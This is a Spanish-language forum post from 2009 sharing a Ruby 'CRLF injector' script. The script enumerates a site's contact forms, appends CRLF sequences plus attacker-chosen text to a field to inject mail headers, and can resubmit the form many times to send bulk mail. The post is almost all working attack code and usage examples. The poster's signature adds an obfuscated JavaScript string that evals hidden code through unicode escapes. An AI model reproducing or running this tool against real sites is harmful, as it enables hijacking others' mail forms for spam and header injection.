« anterior próximo »
Páginas: [1]   Ir Abajo

Autor Tema: Ruby CRLF Injector  (Leído 629 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado SH4V

  • Uzer
  • ***
  • Mensajes: 208
    • N3t-Datagrams
Ruby CRLF Injector
« : 29/10/2009, 10:24:38 pm »
Código: You are not allowed to view links. Register or Login
!#/usr/bin/ruby
#CRLF injector
#http://N3t-Datagrams.net
#N-D labs #{Sh4v}
require 'rubygems'
require 'mechanize'
case ARGV[0]
when "-1"
ARGV.shift
url=ARGV[0]
puts "
Collecting form data..."
agent=WWW::Mechanize.new
url=agent.get(url)
form=url.forms
form.each { |z|
puts "Page: #{url.uri}
Action: #{z.action}
Method: #{z.method}
Form name: #{z.name}
Field(s) name(s): "
z.fields.each { |y|
puts " [-] Name: #{y.name}"
}
}
when "-2"
ARGV.shift
tim=ARGV[ARGV.size - 1].to_i
if tim==0
tim=1
else
ARGV.pop
end
url=ARGV[ARGV.size - 1]
ARGV.pop
agent=WWW::Mechanize.new
url=agent.get(url)
if ARGV[0]=="default"
form=url.forms.first
else
form=url.form(ARGV[0])
end
ARGV.shift
ARGV.each {|x|
if x[x.length - 6, x.length]=="[CRLF]" || x[x.length - 6, x.length]=="[crlf]"
x=x[0, x.length - 6]
puts "Valor para #{x}:"
val=STDIN.gets.chomp
puts "CRLF injection:"
inj=STDIN.gets.chomp
form[x]="#{val}\r\n#{inj}"
else
puts "Valor para #{x}:"
val=STDIN.gets.chomp
form[x]=val
end
}
num=0
puts "Enviando correo(s)..."
until num==tim
agent.submit(form)
num+=1
end
puts "Correo(s) enviado(s) ;-)"
when "-h" || "--help"
puts "
Usage: RCRLF-injector has two modes of operation.

[-h] Display help.

[-1] The first mode is used to gather information about the form.
Example: #{$0} -1 http://example.com/mail_contact.php

[-2] The second mode is used for make the CRLF injection itself.
Example: #{$0} -2 name_of_form name subject mailfrom message http://example.com/mail_contact.php

[*] You can use \"default\" name for use the first form of the url.

[*] If want to make a CRLF injection, you must add \"[CRLF]\" at the end of the vulnerable input, like that:
Example: #{$0} -2 name_of_form name subject mailfrom[CRLF] message http://example.com/mail_contact.php

[*] Another function implemented in RCRLF-injector is the posibility of send a lot of mails. You can do that adding a number at the end of the arguments, like that:
Example: #{$0} -2 name_of_form name subject mailfrom[CRLF] message http://example.com/mail_contact.php 10"

else
puts "Type -h for help."
end
En línea
Citar
ß=+!"{%}";æ=+!'';Ø='[]'+!'[]';Þ=''+!"";Ð=Ø[æ*(æ*(æ)+æ)+æ]+Ø[æ*(æ+æ)*(æ+æ)-ß-~ß-æ]+Ø[(æ-~ß)*(æ-~ß)+(æ-~ß)]++00](æ-~ß)]+Þ[æ]+Þ[ß]+"("+ß+")";\u0065\u0076\u0061\u006c(Ð)"\.^
Páginas: [1]   Ir Arriba
« anterior próximo »